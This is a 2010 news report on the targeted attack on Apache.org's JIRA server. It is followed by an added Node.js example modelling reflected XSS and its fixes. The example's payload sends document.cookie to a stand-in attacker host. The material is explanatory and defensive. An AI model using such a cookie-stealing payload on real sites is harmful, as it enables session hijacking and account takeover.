
Apache.org hit by XSS attack

15 April 2010

The website for the open source Apache Web server at Apache.org was compromised this month by a targeted attack, said the Apache Software Foundation, which has provided a detailed blow-by-blow account of the hack.

According to the Apache Software Foundation's infrastructure team, the attackers first compromised a server at the hosting company SliceHost and used it to open a new issue on the Apache issue-tracking server at brutus.apache.org. The issue report included a tinyURL.com-shortened link, which redirected back to Apache's own installation of the Atlassian JIRA issue-tracking software.

At that URL the attackers had placed a cross-site scripting (XSS) payload designed to steal the session cookie of any logged-in issue-tracker user who followed the link.

"When this issue was opened against the infrastructure team, several of our administrators clicked on the link", said the infrastructure team in a blog post. "This compromised their sessions, including their JIRA administrator rights."
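The cookie-theft mechanism described above, as an added example that is not code from Apache, Atlassian or the original article: a minimal Node.js model of a page that reflects a user-supplied parameter, the same page with contextual output encoding applied, and a session cookie marked HttpOnly so that script cannot read it even if an injection succeeds. The injection point of the real JIRA flaw is not described on the page, so a generic error page that echoes a request parameter stands in for it; the attacker host `attacker.example`, the cookie name and the page markup are assumptions.

```javascript
// Added example, not code from Apache, Atlassian or the article: a generic
// reflected-XSS model. The real JIRA flaw's injection point is not described on
// the page, so an error page that echoes a request parameter stands in for it.

// Constructed attacker payload: loads an "image" from a hypothetical attacker
// host with the victim's cookies appended, the classic session-cookie theft.
const PAYLOAD =
  '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>';

// Vulnerable: the user-controlled message is interpolated straight into HTML,
// so a payload carried in the link the administrators clicked executes in
// their browser with their issue-tracker session.
function renderErrorVulnerable(message) {
  return `<html><body><p>Error: ${message}</p></body></html>`;
}

// Contextual output encoding for an HTML text node: the five characters that
// can break out of text context are replaced by entities.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed: identical page, but the parameter is encoded before insertion.
function renderErrorSafe(message) {
  return `<html><body><p>Error: ${escapeHtml(message)}</p></body></html>`;
}

// Crude marker used only to contrast the two renderers: does the HTML contain
// a script element that a browser would execute?
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

// Second line of defence: a session cookie the browser will not expose to
// document.cookie (HttpOnly) and will send only over TLS (Secure).
// The cookie name is an assumption.
function sessionCookieHeader(sessionId) {
  return `JSESSIONID=${sessionId}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Model of what document.cookie returns: only cookies set without HttpOnly.
function cookiesVisibleToScript(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*HttpOnly\s*(;|$)/i.test(h))
    .map((h) => h.split(';')[0].trim());
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderErrorVulnerable(PAYLOAD));
  console.log(renderErrorSafe(PAYLOAD));
  console.log(cookiesVisibleToScript([sessionCookieHeader('abc123'), 'theme=dark']));
}
```

`escapeHtml` is correct only for the HTML text-node context shown; a value placed inside an attribute, a URL or a script block needs the encoding for that context. HttpOnly does not stop an injected script from acting as the user while the page is open (it can still call the tracker's own endpoints with the session), which is why the output encoding, not the cookie flag, is the primary fix.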

This attack was complemented by a brute-force password attack against the JIRA login page. Using these two attacks, the attackers gained administrator privileges on a JIRA account, turned off notifications for a project, and changed the path used to store uploaded attachments. They then uploaded an attachment that they used to browse and copy the file system. "They also uploaded other [Java Server Pages] files that gave them backdoor access to the system using the account that JIRA runs under," the team explained.

By sending password-reset emails to members of the Apache infrastructure team, the attackers were able to harvest administrator passwords. One of those passwords was the same as the password of a local user account on the issue-tracking server, an account with full access to the sudo program, which lets a user run programs as root. From there they were also able to compromise the main shell server, although on that machine they were unable to escalate privileges with the compromised accounts.

"We started moving services to a different machine, thor.apache.org", said the infrastructure team. "The attackers had root access on brutus.apache.org for several hours, and we could no longer trust the operating system on the original machine."

Although Atlassian responded quickly to reports of the cross-site scripting flaw and issued patches, the Apache team lamented what it described as a lack of responsiveness on the part of SliceHost. "Two days later, the very same virtual host (slice) attacked Atlassian directly", it said.
